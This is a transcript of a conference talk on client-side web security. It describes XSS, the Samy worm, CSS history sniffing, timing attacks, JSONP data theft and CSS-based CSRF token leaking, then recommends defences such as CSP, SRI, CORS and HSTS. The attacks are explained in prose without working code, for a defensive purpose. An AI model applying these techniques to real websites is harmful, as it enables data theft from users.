 It's good to see everyone. I'm gonna be talking today a little bit about security and client-side security, which is a little bit scary and probably boring for a lot of people. So hopefully I can twist it in a way that makes it at least somewhat interesting. I was gonna do this in Spanish, but I was worried I would make a mistake and then I would be muy embarazada. That means pregnant. I don't know, Spanish speakers. Anyways, security. So security is kind of scary. It comes along with a lot of baggage and when developers see the word security or client-side security or something like that, they think to themselves, security is very important. Someone who knows about security should take a look at all this code I'm writing, kind of push it away from their jobs and outside to someone else who's a security person. And I think part of that has to do with the crazy amount of acronyms that are used in security. So there's CSP, SRI, CSRF, XSS, CORS, HSTS. This is enough, I could keep going. But I'll get started with an analogy, I think, for how I see security best practices actually reaching real developers, actual real-life developers, and why maybe good security hasn't necessarily caught on. So I work at Stripe. Stripe is a payments company for the web, which is in California in the United States, San Francisco specifically, but I live in Texas. We had another speaker from Texas, Texas representing well. Texas has a lot of nicknames. A lot of them are not so nice, but one of them is the Lone Star State. And Texas has a lot in common with the web. One of those things is that they both are referred to as the Wild West, just unrelated to what I'm talking about. Anyways, in 1985, Texas had a problem. Texas had a lot of problems in 1985, but we'll go with littering. And you might not think that littering is something that anyone would fight for, the right to litter, but at the time, some Texans defended their God-given right to litter. So it was a real thing. There were fines for littering that they did, so some of you, if you've been to Texas, might recognize this sign. This is pretty common, even in other states as well. But that didn't do anything, no one seemed to care. And the state tried some slogans. One of those slogans was Keep Texas Beautiful, which is really, you know, it's like flowers and it's pretty and blue. And it's like, hey, all you people who are defending your right to litter respond to this nice, pretty picture and this slogan and like, won't this make you stop littering? So they might as well just add like, pretty please with the cherry on top, Keep Texas Beautiful. So these slogans did not resonate with the people who were doing the littering. And so they did some research and the people who were doing the littering, they recognized as Bubba's in pickup trucks, males 18 to 24. And this was like the core demographic of people who were throwing trash on the side of the road. And so in 1985, this was about 30 years ago, Mike Blair and Tim McClure of GSCNM, they do like the Mercedes advertising, their big advertising firm in Austin, where I'm from, and they teamed up with the Texas Department of Transportation and they created a slogan, an anti-littering campaign called Don't Mess with Texas. And you might have heard Don't Mess with Texas, it's in songs, it's in like movies and all this kind of thing. It's like a popular phrase and a lot of people don't know that it's actually an anti-littering campaign, but it worked. They reached their core audience of these prideful people who were defending Texas by not allowing you to litter. It became something. And they reduced litter on Texas highways by 72%. I wrote that down, I created that slide, and then I thought to myself, whose job is it to measure litter on the side of the highway? And why don't they just pick it up? So my point is, with security, hey everyone, pretty please, will you please make your website secure because it's important and it's the right thing to do, probably isn't going to be the thing that convinces us all to be secure. It has to be something that's a default, something that's built in, and something that we're prideful about and we wanna do because we feel strongly about it. And one of the ways that I can make you feel strongly about it is help you realize how hopeless that you are. There is no hope in security. You can never win. You can patch a thousand holes and someone only has to find one. So we can also discuss how the web is evolving to kind of fight against that model. I also wanted to note that don't mess with XSS. Probably won't work either. The key here is that web developers, not security people, are the core audience of security research. And it seems like this external security people, but it's all of your jobs to make your applications secure by default. And web security is hard. I think Mike West once said, all you have to do is never make a single mistake. I guess he's not wrong. I think he summarized this by everyone has deadlines. So Alex Russell also said, I discount the probability of perfection. So if you look at all you have to do is never make a single mistake and then discounting the probability of perfection, you can guess that you're probably gonna have some security flaws in your application. The core way that security flaws occur is via content injection. It's not the reason for them, but the way they manifest themselves is in content injection. And so the type of content is, it could be anything, it's usually a script and that's kind of what we're talking about today. But it doesn't have to be, it could be images or flash or CSS, it can be anything. And content injection sounds scary and weird, but this is all it is. So you have a template, this is handlebars, old handlebars, and you have some loop and you're injecting content from some database and inside of there, you're just spitting out content. If you notice I used the three bracket handlebar thing because by default handlebars escapes. Let's say the content was supposed to be HTML. And in this case, some jerk puts a script tag into our list of items and then this is what comes out and this is a classic XSS attack. So I put a script tag where you didn't expect it, you put that script tag onto your page and now my script runs every time someone loads that page. That's content injection. Everyone always has a friend that picks script alert as their username for your demo, like chat app. I think at Austin JS, our local meetup, every time someone demos a chat app, within the first 30 seconds, 10 people log in to the chat app and all of them are script tags as names, those jerks. One such friend, this is my user agent and side note, that's crazy. User agents are actually crazy. Anyone know what browser that is? It's obviously Mozilla, Apple, WebKit, Gekko, Chrome, Safari. But anyways, that's my user agent. It's probably similar to yours if you use Chrome. This is my friend, Mike Taylor's user agent which seems pretty similar. But if you look closer, he added that. And I first thought, that's brilliant because your user agent gets sent on every request and things like that. But then I realized that it doesn't display back to you. He's really only trolling logging software and what's my user agent sites? I guess, I don't know. Anyways, this is Sammy. Sammy, we won't focus too much on Sammy, but Sammy is a good, he's good at hacking. And he wrote something called the Sammy computer worm and it was JS space hero is what Norton Enivirus called it. And really all he did is he found an XSS vulnerability in MySpace and he made MySpace, if you went to his page, it would automatically friend him and then it would write on your wall or whatever MySpace had. And it would say, Sammy is my hero. And then it would inject that same code into your page and so anytime someone visited your page, you would also friend Sammy. And overnight he became the second most popular person on MySpace behind Tom, obviously. Not Tom Dale, I'm sure he was third at the time. And that was the Sammy's my hero. Actually interesting story is that he was then arrested under the USA Patriot Act and pleaded guilty to a felony charge and wasn't allowed to use a computer for three years. Yay! For friending people on MySpace, that's crazy. Actually though I recently found out that the way that actually went down, this is again totally unrelated, is that they offered him a job that like MySpace said, hey, come out to San Francisco and interview and then when you get off the plane in San Francisco, cops are waiting for him and they arrested him. So if you ever hack anyone, don't then accept a job from them. Unless you're really sure. Sammy wrote something after his three year probation called EverCookie and whatever cookie does is it uses cookies to store data and then the next time you visit the webpage, you can get that information back. But in case someone cleared their cookies, it also uses like flash cookies and also silver light storage and also CSS history knocking and e-tags and web cache window name, user data uses like Java exploits and pretty much it stores your information everywhere. No matter how you try to kill it, it'll go away, there's an FAQ on the page and says, how do I stop websites from doing this? Great question. So far I found that using private browsing in Safari will stop all EverCookie methods after a browser restart. I also found one other method which is just setting your computer on fire and buying a new one. This has actually been mostly cleaned up. One nice thing about EverCookie is for a little while it was scary and all the ad agencies started using it, but then browsers had like a system to test against to say, are we vulnerable to EverCookie? And they've mostly cleaned things up. But that's an instance of a hack that you don't realize can follow you around. So let's just detect malicious scripts. All we have to do is find something that's accessing something we don't like or doing something like that. So we start writing scripts differently. So here's a script that we could write and that's valid JavaScript. And obviously everyone knows that that's just alert one. So you can detect malicious scripts. You just have to be able to know that that's malicious, right? So not quite the best plan detecting malicious scripts. Sure, it couldn't hurt, but you're not gonna be able to do it well. One of my favorite examples of not being able to detect malicious scripts is this one. This is a pretty good hack. It's from Billy Hoffman he introduced it in 2010 at JSConf. And there it is, that's the code, that's the malicious code, right in between those two script tags. Tab, space, tab, tab, space. And that's eight bit characters that are then eval back into JavaScript. Ones and zeros, if you will. And so you have a block that is just an empty script tag to you inside of your view source window and that's now malicious code. So you cannot detect malicious code. What if we just try to get rid of the ability to inject script tags? So you could take your output and at the very end just kill all the script tags and remove them all. And this would be cool, but you can inject content lots of different ways. There's the onload property, your links can have JavaScript URLs instead of regular URLs. There's lots of things, but let's say you were actually just convinced all your users to turn JavaScript off entirely. Now you can't hack me, right? So we can talk about CSS hacks, more content injection. So the most popular CSS hack is called link knocking. And you know how whenever you have been to a link it's purple and if you haven't, it's blue. Well, that reveals a lot of information. So I can just inject, say 300 million URLs onto your page and then check the color of them all and then see what sites you've been to. Like the top 300 million sites would be a good start there. And that sounds pretty like harmless, like how many could you do in a second? But some people did some pretty scary things with Google searches. If you know you're in Chrome, you know the likelihood or like the set of parameters that Chrome injects into a Google search whenever you used like the awesome bar up top. And so you can then just inject a bunch of different Google searches. And what someone did is they put in like scary health things, like dealing with cancer or going into debt or something like that, something that you might search for if you have a problem. And then they just enumerated a bunch of different versions of those and they could more or less reliably find out if you had ever searched for treatments for different diseases. And then they said, what if your healthcare provider could do this? It's totally a real thing that could actually really happen and really affect people. I know healthcare is not necessarily a good example in Spain, but bear with the Americans. So the Visited Selector is actually changed now in most newer browsers. More or less, they fixed it by saying, we're just gonna lie to you about the color of links, which is cool. Like it's pretty difficult because you have to also do like child selectors and all those types of things. And so let's say like, let's consider that fixed, but then we can add another hack into the mix. And this is called a timing attack. And timing attacks haven't traditionally been something that have been very possible in browsers. Because timers in browsers suck really bad. So I call that security by inaccuracy. But a timing attack really comes down to, like the most famous timing attack is password checks. So if my password is password one, two, three, and I checked that against the password you typed in and I just checked P against whatever word you typed in and the first letter fails and I say no, this is a failure. And then you type a letter that starts with P and it takes a little bit longer for it to fail. And then I can actually like figure out like the longer it takes for you to fail, the more I know that my password is correct. And people can backwards figure out passwords from that. So that's traditionally up impossible, but now we have this new cool thing called quest animation frame. It's a very reliable timer in browsers. And we also have the visited selector from before, but it's gonna lie to you about what color it is. So you can't necessarily get changed information from it if someone's doing that, but you can get something just as valuable. So let's say we added a really gross drop shadow, text shadow to our text. And here's the hack. Do you see, do you feel it yet? This powerful hack, it's just, it convinces you via hypnosis to type in your password. What's actually happening is that this takes less than 16 milliseconds to render, and this takes well over 60 milliseconds to render because it's hard for GPUs to render drop shadows. And so the only way that we could fix this is if we just made all things render more slowly, and that's never gonna happen. And so you can actually pretty reliably still use the CSS knocking technique, but now at least it takes a lot longer. Like it's a lot more computationally expensive, and you have to be on a page, but that I don't think will ever go away. So let's move on. JSONP is something that you use. It's called JSON with padding. I say JSON, some people say JSON, and Douglas Crawford, who created it, finally weighed in on it a few years back, and he was a jerk and said it's pronounced JSON. Not a cool move. Anyways, I like to call JSONP, JSON pretty insecure, nailed it. Hey, I'd really like it if someone could run arbitrary dynamic scripts on my page. I'm a JSONP user. Anyways, whenever you do this, this is a JSONP request. It feels like Ajax. It feels like you're doing a request to a different thing, but really all that happens is you inject a script on your page, and the content of that can have dynamic data that comes back, and that's kind of this cross-domain hack that's beautiful and helped the web grow, but it's also like you're allowing someone to just run dynamic arbitrary code on your page. And so, what could they do? What if the callback, the script that they injected looked like this? You go grab the Social Security number out of the page, make a request real fast with that number in it, and then I'll still give you your information back, and so it actually feels like things are still working just fine, but also I'm siphoning off all these Social Security numbers. Just don't deal with Social Security numbers in general. So, you should probably use Cores. That's not a real tumbler, by the way. People get mad at me whenever I show this. I should change that. Not a real tumbler. Maybe I'll make the test. Someone make, you should probably use Cores.tumbler.tumbler.tumb. But anyways, we gotta go. Cross-origin resource sharing. Cross-origin resource sharing, that's Cores. So, use headers in order to like whitelist different domains that you're willing to talk to, and that's maybe a better solution than JSONP for talking across domain. This is a real website you can go to, and it'll help you figure out how to enable it in different servers. So, just predict against JS and script tag injections and CSS injections, and you're good, right? So, let's talk about CSRF a little bit. CSRF is something that we can talk about. It's a little bit of a server-side security measure, but it really stops people from being able to like load a page from a different website just as an iframe, and then have that page do an action for you. Other people can't like things on Facebook for you by just loading up the URL that is requested whenever you make a like. So, this CSRF value is pretty crappy. It's only four characters. But imagine, if I was able to inject CSS anywhere into your page, that looks something like this. If there's a value of 0001, then a request will be fired off for this image that may or may not exist or anything. And then I could enumerate that a couple times, maybe three times, or maybe like, say, two million times. And then I have two million attempts at figuring out your CSRF token. I can just watch that server log, and if one of them ever gets requested, I have a bunch of information about your IP address and all these things, and then I also have your CSRF token. And you say, that's huge, but all of you ship two megabyte mobile apps, right? And so, GZips, this is like core use case for GZip. It's like really great for GZip. And it gets worse than that. The worst possible world is where you actually do all of the security protections that you're supposed to. You stop content injection, you do all that stuff, you've actually done everything right, and then browser vulnerabilities can still get you in the end. So this is white paper a few years back. A lot of this has been somewhat cleaned up, but not entirely, but it's also a little bit infeasible, but it could become more and more feasible. So it's cross-domain data snooping with SCG filters and OCR, which is its own talk title, I think. They probably actually did give a talk. So let's say you injected an iframe, and then you're able to put an SCG filter over it that kind of grabbed contrast. And so now you can have an SVG that represents the page behind it. So you kind of have an image of the iframe behind you, and then you can use OCR to image to text, and then grab text out of the page. And so even if this person didn't do anything wrong, then I can still grab words out of there. And one of the things that was tough was different fonts and different locations, and how do you OCR that well? And what someone figured out is you can actually load up the View Source URL, and you get the perfect code source background. We know it's gonna be 14-point Consolus sands or something. I wonder what they use. Anyways, that sucks. We need a new approach, and that approach is called Content Security Policy, CSP. And recently one of the people who works on it announced that she wants to change the name to increase CSP adoption. Like I said, there are a lot of acronyms. They're renaming it to BatShield. Back acronym, trustworthy, secure, internet-enabled, lightweight, fence. And if you look lower, she forgot the H added it later. It means helper. She drew this helpful diagram for it, so BatShield is what we're talking about today, not CSP, which is, I think, great, it's much better. CSP is a header. It looks a little bit like this, obviously not as many dots. But what it allows you to do is, by default, more or less lock everything down entirely. Like you can't even do anything on your own page, your own self, except for render HTML. And then it lets you open up little holes for the things that you want to use, and hopefully only those things. So by default, it disallows inline JS and CSS. So if anyone's able to inject that content, it won't even run. It also disallows eval. So even if they inject that whitespace stuff, there's no way for them to render or eval that whitespace stuff anywhere. It disallows all cross-domain, JavaScript, CSS, image fonts, et cetera, like Swift files. And so even if you're able to inject CSS and match a CSRF, that image is on a different domain and it's not in the right rule set, and so that person never gets your CSRF. And it also allows you to report violations. And so anytime there is a violation, a URL gets hit that says this was violated by this IP address at this time, blah, blah, blah, and you can kind of follow up those. It's a little bit of a mess because all of your browser plugins all violate the CSP almost universally. And so it's really noisy output, but if you can filter it well enough, it's kind of nice. So the key is that this is a whitelist. It's the opposite of saying I want to try to figure out all the possible hacks and then prevent each of them individually. What it says, I want to prevent everything. Like even good stuff. And then I want to just open up the little things that I need to do. And some of that kind of stinks because it's good performance to load your CSS inline to the top of the page for the critical render path. So what do you do for that? And that's why CSP2 is, it's kind of out. It's in some browsers, but not all of them yet. And it allows you to put integrity hashes. So it says it's fine to run this inline CSS as long as it matches this hash output. And so it allows you to whitelist specific pieces of CSS or JavaScript that you are allowed to inline, but generic things wouldn't be as possible. And I think that's really good. It also has nice graceful degradation from CSP1, which is cool, but I won't go into. There are some pages that you can learn more about content security on cspsawesome.com is a good one. There are tools that you can integrate with. Helmet is one for Express that'll just help you inject like all these kinds of security headers into there. If you use like Ember, there's Ember CLI content security policy, which is built into Ember CLI by default. And so if you use Ember CLI, you'd actually have to actively turn off content security policy or Bad Shield. And that's great. That's kind of what I'm talking about by making security the default is that by using Ember, you're probably going to have CSP on by default. And I think that's what we need to work towards. Like library authors need to help people by default have security and then opt out of it rather than the other way around. SRI is a new acronym that we get to learn and that stands for Sub-Resource Integrity. And so if you wanna load, especially external domain scripts like jQuery from the CDN or Google Analytics from somewhere else, you can add a hash and say this script must match this hash. And if it gets changed, don't run it because I don't know what the change was and I need to know what those changes are. And this sounds a little bit crazy. Like why would I ever need to do that for the jQuery CDN? But this is a copy of jQuery that I downloaded from my mobile phone while I was in London once and it looks pretty normal. It looks like regular jQuery, but if you zoom in, it starts looking a little weirder. You might notice some weird stuff, specifically in this region here. That does not look like regular jQuery to me. There's a document right in there suddenly. I know jQuery isn't that silly. So over HTTP connections, that mobile network was injecting ads into every page that used jQuery on a CDN. And this would fail the CSP for those, it would fail the SRI, the sub-resource integrity, because that script would no longer hash to the same URL or the same hash that it used to. I think that's really great, especially for cross domain things. You can actually reference a fallback script to say like if that script gets changed, load one locally, which is kind of nifty. SRI is still a working draft, but it's shipped in Chrome, but there's a bug with UTF-8, so figure it out. You can actually do an SRI hash generator if you don't want to figure out what things hashed you. You can kind of put it in a URL and figure out the hash and then just use it. So you don't even need fancy tooling, but there is fancy tooling. And you can come and read these specs or contribute and say like I hate this or this is good. So good security goes beyond just preventing content injection. That's kind of what we've been talking about. There are other measures that you can use. HTTPS everywhere is something that like, you should be using HTTPS, but I don't like HTTPS everywhere because it's not specific enough. I want HTTPS only. Like you shouldn't have the HTTPS version of your site. There's no reason to have it. It's not slower. You can get HTTPS certificates for free now, and that's only gonna get easier. So if someone hits your HTTPS site, you should 301 them to your HTTPS site, much like my website does. A beacon for all people to, I really lost it there yet. Another good thing is once you do hit the HTTPS site, add the strict transport security, which is HTTPS, right? So this is pinning. It says even if someone, now that they've been to my website over HTTPS, even if someone tries to go to the HTTPS page, immediately don't even let the request go through for the HTTPS page. Just bump them over to HTTPS. And that's a really good thing. And just set a max age on it because you're never ever going to serve anything over HTTPS anymore, right? So that's HTTPS. And you can actually promise, like you can give the promise ring of promises to be HTTPS forever if you want. There's this page and it's pretty hidden in some mailing list that it was posted on, but I happen to follow that very boring web security mailing list. And a Google engineer created this and he said, if anyone wants to be in the Chrome pinned HTTPS list, just add your domain here. And I think like three people initially did, I was one of them. And it used to be that if you were a big company, like Stripe or something like that, you could ask Chrome to say, don't even wait for the first time that someone requests this in order to get my HTTPS header just never let anyone use Chrome to hit Stripe.com over HTTP. And so Chrome actually has this built-in list of sites that are already forced HTTPS. And so I added alexxson.com. And at the time it was like Dropbox, Stripe, Bank of America, alexxson.com. It was really great. Now it's Cyber Shambles, as prep, I don't know, URL kitten, it's nice. Anyways, this list is actually shared now by all the browsers. So IE and Firefox and Safari all pull this list in separately. And so you cannot hit alexxson over HTTP anymore, which is cool. .com, alexxson.com, not me. You could hit me over HTTP, I guess. Frame busting is another thing that is good to do. So we talked about that SVG hack. And one thing, unless you explicitly want to be iframed, if you're like the like button, if you are the like button, you want to be an iframe in someone's page. But for the most part, I never want someone iframing, Stripe.com, I never want them iframing, alexxson.com. And so you can actually send a header. And this header is old. Like X-Frame options has actually been replaced with CSP. So she did it in CSP, but there's still plenty of browsers that this helps, and so you can still throw it in there. And the idea is that if we add all these different headers and we add these different things, and we lock everything down by default, we're secure by default, and then we're opening up little holes. And so you can rely a little less on being perfect every time and try to just build web apps like you already want to do. As long as you have that good base. But only matters if we all buy it. So don't mess with the web. So everyone, turn on, please, turn on all your security stuff. Pretty pleased with sugar on top. I don't actually have a good slogan for you. I have to talk to GSC and I'm about that, but thank you guys.